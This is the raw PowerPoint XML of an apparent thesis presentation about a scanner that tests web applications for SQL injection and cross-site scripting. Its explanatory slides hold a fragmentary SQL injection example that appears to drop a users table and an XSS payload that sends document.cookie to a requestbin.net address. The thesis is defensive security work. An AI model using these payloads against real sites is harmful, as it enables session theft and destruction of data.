                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6A981C-2798-42E8-9708-21518D674C92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850026" y="2810080"/>
            <a:ext cx="372718" cy="228599"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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AE4857-DE3D-479A-A614-369E29A3D6AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673545" y="3051933"/>
            <a:ext cx="0" cy="1510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88FC24-A477-4C94-A8D6-41665B047A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514766" y="3038678"/>
            <a:ext cx="0" cy="1510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812F367-DC3B-4FB3-ABDA-BBFA21027E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324931" y="3015490"/>
            <a:ext cx="0" cy="1510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7F8AAF-ADBC-447C-9F66-1C4109F59FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204689" y="3015490"/>
            <a:ext cx="0" cy="1510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8E0832-C85D-434D-BFF0-E7D0E06D7D5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9036385" y="3051933"/>
            <a:ext cx="0" cy="1510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BE314A-6182-4204-82AF-8D2EEDCE80D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10837022" y="3015490"/>
            <a:ext cx="0" cy="1510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31CA39-24B3-46FE-BC55-CC971E22413D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1167637" y="229942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 2019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619A7E-0800-40AA-9D73-072EBD836B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10277864" y="236184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June2022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0F941A-FD7C-4F92-8B35-B09EACB69B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8530477" y="2348022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2022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CE125F-7D6A-474D-AEA0-11BDC2CD5590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629188" y="233756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Feb 2020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CEB0CB-E403-433F-BD70-4C48EBE615E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3008858" y="2373632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April 2019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B506C2-1B90-419E-AB6F-B60023501184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819023" y="2373632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Aug 2020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FA5C3D-B9AA-426E-8CAF-74F9282EE1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2860247" y="47080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Pre-Seminar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979FE5-4600-418C-BFA2-28341DEE29E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615900" y="470755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Seminar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7A6B93-8EE7-4C94-B6FE-3BDBD0CEEFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525750" y="4707558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Seminar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E88019-9C00-4166-8793-E43E69D4F867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8386207" y="470801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Seminar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C93726-1689-47F1-935E-9D078A111518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10277864" y="4666587"/>
            <a:ext cx="253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4819FB-0DB9-4015-B10C-80AE86782C4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317872" y="4707558"/>
            <a:ext cx="237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Thesis Proposal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694580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694B9-F3AD-4606-A9F7-294FA106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FC68-1698-47DF-B28A-B310F96FFBCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"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308B7-42A0-4ADD-BDAD-0650DF5B2033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1780075" y="2967335"/>
            <a:ext cx="8631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395850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96DD-C086-4F15-A400-A908E492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Vulnerability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B0F8-8495-47FC-822D-606F1D966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vulnerability is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weakness in the application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can harm related users to use the web application.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so many different kinds of vulnerabilities but, it is indicated to OWASP in 2019 that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and XSS attacks reach number one and seven vulnerabilities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in web application. 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and XSS attacks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vulnerabilities are emphasized on this thesis.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5579D-751E-4D5C-8C3F-9859D82E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82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DF60-C090-4E84-A2CD-94AF4039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A084-3993-4D02-BBC5-44641A5EE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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Structured Query Language (SQL) Injection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server-side code injection attack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Structured Query Language.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exploits the web application with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predefined SQL command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take unauthorized access from the database.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mostly occurs when the developers properly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unvalidated the  user input as part of SQL query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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="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users WHERE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=10;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table users - - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="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SQL statement                                     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malicious SQL statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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31DD-9C9A-48BC-A77D-6108342A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DF60-C090-4E84-A2CD-94AF4039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A084-3993-4D02-BBC5-44641A5EE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Cross Site Scripting (XSS) attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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different from SQL injection because it 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client-side code injection attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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generally written  with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code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sometimes with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code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injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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targeting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mostly used to modify the content of the website, steal user’s cookies or session information, redirect the website that is created by the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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happen if the web application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validate the user input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requesting from the untrusted source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sanitize the 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HTTP response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0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document.location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=http://requestbin.net/r/w4obypw4=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'+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document.cookie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pPr lvl="2" algn="just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0952-48FD-4FED-8112-619142EF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5908-9258-41DB-B1B3-379239A250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3910</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>382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Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Application Vulnerability Testing System Using   XSS_SQL_Scanning_Algorithm </vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Application Vulnerability</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Naïve Pattern Matching Algorithm</vt:lpstr>
      <vt:lpstr>Related Works</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Overview of the System</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>XSS_SQL_Scanning Algorithm</vt:lpstr>
      <vt:lpstr>System Flow</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>UI Design (Scanning possible URLs in Web Application)  </vt:lpstr>
      <vt:lpstr>UI Design (Filtering query of URL’s parse from the result of crawled URL)  </vt:lpstr>
      <vt:lpstr>UI Design (Testing URLs with SQL quotes for SQL injection)  </vt:lpstr>
      <vt:lpstr>UI Design (Testing URLs with SQL blind based payloads for SQL injection)  </vt:lpstr>
      <vt:lpstr>UI Design (Testing URLs with SQL time based payloads for SQL injection)  </vt:lpstr>
      <vt:lpstr>UI Design (Showing the information type message box to know when testing           process is finish )  </vt:lpstr>
      <vt:lpstr>UI Design (Testing Results)  </vt:lpstr>
      <vt:lpstr>Side effect caused by SQL vulnerability   </vt:lpstr>
      <vt:lpstr>UI Design (Vulnerable URLs with attack patterns in case of blind sql injection         shown as text file )  </vt:lpstr>
      <vt:lpstr>UI Design (Testing URLs with XSS payloads for Cross Site Scripting )  </vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>UI Design (Calculating the accuracy for the system )  </vt:lpstr>
      <vt:lpstr>Advantages</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Limitation and Future works</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Thesis Schedule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Web Application Vulnerability Testing System Using   Proposed XSS_SQL_Scanning_Algorithm </dc:title>
  <dc:creator>Thinzar Aung</dc:creator>
  <cp:lastModifiedBy>Thinzar Aung</cp:lastModifiedBy>
  <cp:revision>174</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-14T09:23:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-23T03:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>